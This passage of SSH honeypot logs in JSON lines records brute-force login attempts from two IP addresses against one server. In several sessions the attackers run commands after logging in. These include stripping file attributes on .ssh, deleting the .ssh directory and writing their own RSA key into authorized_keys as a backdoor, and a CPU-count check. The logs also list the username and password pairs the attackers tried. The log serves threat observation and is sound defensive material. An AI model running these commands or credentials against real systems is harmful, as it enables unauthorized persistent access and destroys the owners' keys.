{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: ERRORnot enough values to unpack (expected 3, got 1)", "src_host": "209.38.229.174", "src_port": 51114, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:05:39.696335"}
|
| 137 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "51114", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:05:39.842777"}
|
| 138 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:41964 (64.31.55.123:22) [session: 34b10e61c59e]", "src_host": "209.38.229.174", "src_port": "41964", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:06:01.304216"}
|
| 139 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "41964", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:06:01.457010"}
|
| 140 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'www'/b'test123test'] failed", "src_host": "209.38.229.174", "src_port": "41964", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:06:02.132312"}
|
| 141 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "209.38.229.174", "src_port": "41964", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:06:03.279201"}
|
| 142 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "41964", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:06:03.280357"}
|
| 143 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 43.156.90.187:39628 (64.31.55.123:22) [session: b9a4b80b15e4]", "src_host": "43.156.90.187", "src_port": "39628", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:06:14.625259"}
|
| 144 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "43.156.90.187", "src_port": "39628", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:06:14.802679"}
|
| 145 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'lanzafama'/b'lanzafama'] failed", "src_host": "43.156.90.187", "src_port": "39628", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:06:15.598237"}
|
| 146 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "43.156.90.187", "src_port": "39628", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:06:16.777570"}
|
| 147 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "43.156.90.187", "src_port": "39628", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:06:16.778812"}
|
| 148 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:32812 (64.31.55.123:22) [session: c10226b08553]", "src_host": "209.38.229.174", "src_port": "32812", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:06:59.136441"}
|
| 149 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "32812", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:06:59.282469"}
|
| 150 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'root'/b'craig'] succeeded", "src_host": "209.38.229.174", "src_port": "32812", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:06:59.952511"}
|
| 151 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cd ~; chattr -ia .ssh; lockr -ia .ssh", "src_host": "209.38.229.174", "src_port": 32812, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:07:00.928809"}
|
| 152 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: chattr: command not found\nlockr: command not found\nroot@ubuntu:~# ", "src_host": "209.38.229.174", "src_port": 32812, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:07:51.527109"}
|
| 153 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "209.38.229.174", "src_port": "32812", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:07:51.529394"}
|
| 154 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "32812", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:07:51.530052"}
|
| 155 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:39304 (64.31.55.123:22) [session: 1ec048f65975]", "src_host": "209.38.229.174", "src_port": "39304", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:07:51.530893"}
|
| 156 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:42116 (64.31.55.123:22) [session: 12831580fdb1]", "src_host": "209.38.229.174", "src_port": "42116", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:07:51.531647"}
|
| 157 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 43.156.90.187:42096 (64.31.55.123:22) [session: ac711d04b4d6]", "src_host": "43.156.90.187", "src_port": "42096", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:07:51.532348"}
|
| 158 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "39304", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:07:51.533311"}
|
| 159 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "42116", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:07:51.534541"}
|
| 160 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "43.156.90.187", "src_port": "42096", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:07:51.710810"}
|
| 161 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'aymar'/b'123456'] succeeded", "src_host": "43.156.90.187", "src_port": "42096", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:07:52.467309"}
|
| 162 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cd ~; chattr -ia .ssh; lockr -ia .ssh", "src_host": "43.156.90.187", "src_port": 42096, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:07:53.583188"}
|
| 163 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: chattr: command not found\nlockr: command not found\nroot@ubuntu:~# ", "src_host": "43.156.90.187", "src_port": 42096, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:09:02.565367"}
|
| 164 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "43.156.90.187", "src_port": "42096", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:09:02.569840"}
|
| 165 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "43.156.90.187", "src_port": "42096", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:09:02.570879"}
|
| 166 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:51902 (64.31.55.123:22) [session: 68f5697de02d]", "src_host": "209.38.229.174", "src_port": "51902", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:09:02.572317"}
|
| 167 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 43.156.90.187:48258 (64.31.55.123:22) [session: 14e6db73a57b]", "src_host": "43.156.90.187", "src_port": "48258", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:09:02.573129"}
|
| 168 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 43.156.90.187:56450 (64.31.55.123:22) [session: 3f31db739cee]", "src_host": "43.156.90.187", "src_port": "56450", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:09:02.590293"}
|
| 169 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:42750 (64.31.55.123:22) [session: e46219bc9bb2]", "src_host": "209.38.229.174", "src_port": "42750", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:09:02.591057"}
|
| 170 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "51902", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:09:02.592633"}
|
| 171 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "43.156.90.187", "src_port": "48258", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:09:02.593106"}
|
| 172 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "43.156.90.187", "src_port": "56450", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:09:02.594389"}
|
| 173 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "42750", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:09:02.739721"}
|
| 174 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'berlingieri'/b'123456'] succeeded", "src_host": "209.38.229.174", "src_port": "42750", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:09:03.382405"}
|
| 175 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cd ~; chattr -ia .ssh; lockr -ia .ssh", "src_host": "209.38.229.174", "src_port": 42750, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:09:04.561936"}
|
| 176 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 43.156.90.187:59792 (64.31.55.123:22) [session: 61d2dced4f02]", "src_host": "43.156.90.187", "src_port": "59792", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:15:45.306213"}
|
| 177 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "43.156.90.187", "src_port": "59792", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:15:45.483883"}
|
| 178 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'tour'/b'tour'] failed", "src_host": "43.156.90.187", "src_port": "59792", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:15:46.281316"}
|
| 179 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "43.156.90.187", "src_port": "59792", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:15:47.460405"}
|
| 180 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "43.156.90.187", "src_port": "59792", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:15:47.461378"}
|
| 181 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:54218 (64.31.55.123:22) [session: 02648a9818a5]", "src_host": "209.38.229.174", "src_port": "54218", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:16:18.125565"}
|
| 182 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "54218", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:16:18.271590"}
|
| 183 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'agnafit'/b'123456'] succeeded", "src_host": "209.38.229.174", "src_port": "54218", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:16:18.946448"}
|
| 184 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cd ~; chattr -ia .ssh; lockr -ia .ssh", "src_host": "209.38.229.174", "src_port": 54218, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:16:20.019817"}
|
| 185 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: lockr: command not found\nroot@ubuntu:~# ", "src_host": "209.38.229.174", "src_port": 54218, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:16:20.021012"}
|
| 186 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~", "src_host": "209.38.229.174", "src_port": 54218, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:16:21.296950"}
|
| 187 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: root@ubuntu:~#", "src_host": "209.38.229.174", "src_port": 54218, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:16:21.297509"}
|
| 188 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:55668 (64.31.55.123:22) [session: f24d6330a963]", "src_host": "209.38.229.174", "src_port": "55668", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:16:21.585718"}
|
| 189 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "55668", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:16:21.733445"}
|
| 190 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'345gs5662d34'/b'345gs5662d34'] failed", "src_host": "209.38.229.174", "src_port": "54218", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:16:22.400942"}
|
| 191 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "209.38.229.174", "src_port": "55668", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:16:23.548193"}
|
| 192 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "55668", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:16:23.549241"}
|
| 193 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:56512 (64.31.55.123:22) [session: b2a79576e969]", "src_host": "209.38.229.174", "src_port": "56512", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:16:23.694040"}
|
| 194 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "56512", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:16:23.842379"}
|
| 195 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'agnafit'/b'3245gs5662d34'] failed", "src_host": "209.38.229.174", "src_port": "54218", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:16:24.529991"}
|
| 196 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "209.38.229.174", "src_port": "56512", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:16:25.678376"}
|
| 197 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "56512", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:16:25.679222"}
|
| 198 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cat /proc/cpuinfo | grep name | wc -l", "src_host": "209.38.229.174", "src_port": 54218, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:16:26.516729"}
|
| 199 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: ERRORnot enough values to unpack (expected 3, got 1)", "src_host": "209.38.229.174", "src_port": 54218, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:16:26.517556"}
|
| 200 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "54218", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:16:26.665125"}
|
| 201 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:45066 (64.31.55.123:22) [session: 672482b544af]", "src_host": "209.38.229.174", "src_port": "45066", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:17:12.202033"}
|
| 202 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "45066", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:17:12.347608"}
|
| 203 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'tykeedra'/b'123456'] succeeded", "src_host": "209.38.229.174", "src_port": "45066", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:17:13.017613"}
|
| 204 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cd ~; chattr -ia .ssh; lockr -ia .ssh", "src_host": "209.38.229.174", "src_port": 45066, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:17:14.053431"}
|
| 205 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: lockr: command not found\nroot@ubuntu:~# ", "src_host": "209.38.229.174", "src_port": 45066, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:17:14.054233"}
|
| 206 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~", "src_host": "209.38.229.174", "src_port": 45066, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:17:15.214677"}
|
| 207 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: root@ubuntu:~#", "src_host": "209.38.229.174", "src_port": 45066, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:17:15.215268"}
|
| 208 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 43.156.90.187:48360 (64.31.55.123:22) [session: 780c751d713a]", "src_host": "43.156.90.187", "src_port": "48360", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:17:15.216864"}
|
| 209 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "43.156.90.187", "src_port": "48360", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:17:15.393684"}
|
| 210 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:46458 (64.31.55.123:22) [session: d9287484883e]", "src_host": "209.38.229.174", "src_port": "46458", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:17:15.505347"}
|
| 211 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "46458", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:17:15.652965"}
|
| 212 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'akkermans'/b'akkermans'] failed", "src_host": "43.156.90.187", "src_port": "46458", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:17:16.145974"}
|
| 213 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'345gs5662d34'/b'345gs5662d34'] failed", "src_host": "209.38.229.174", "src_port": "46458", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:17:16.328413"}
|
| 214 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "43.156.90.187", "src_port": "48360", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:17:17.325361"}
|
| 215 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "43.156.90.187", "src_port": "48360", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:17:17.326447"}
|
| 216 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "209.38.229.174", "src_port": "46458", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:17:17.476322"}
|
| 217 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "46458", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:17:17.477357"}
|
| 218 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:47244 (64.31.55.123:22) [session: 00b0267f06b0]", "src_host": "209.38.229.174", "src_port": "47244", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:17:17.621097"}
|
| 219 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "47244", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:17:17.765552"}
|
| 220 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'tykeedra'/b'3245gs5662d34'] failed", "src_host": "209.38.229.174", "src_port": "47244", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:17:18.432596"}
|
| 221 |
+
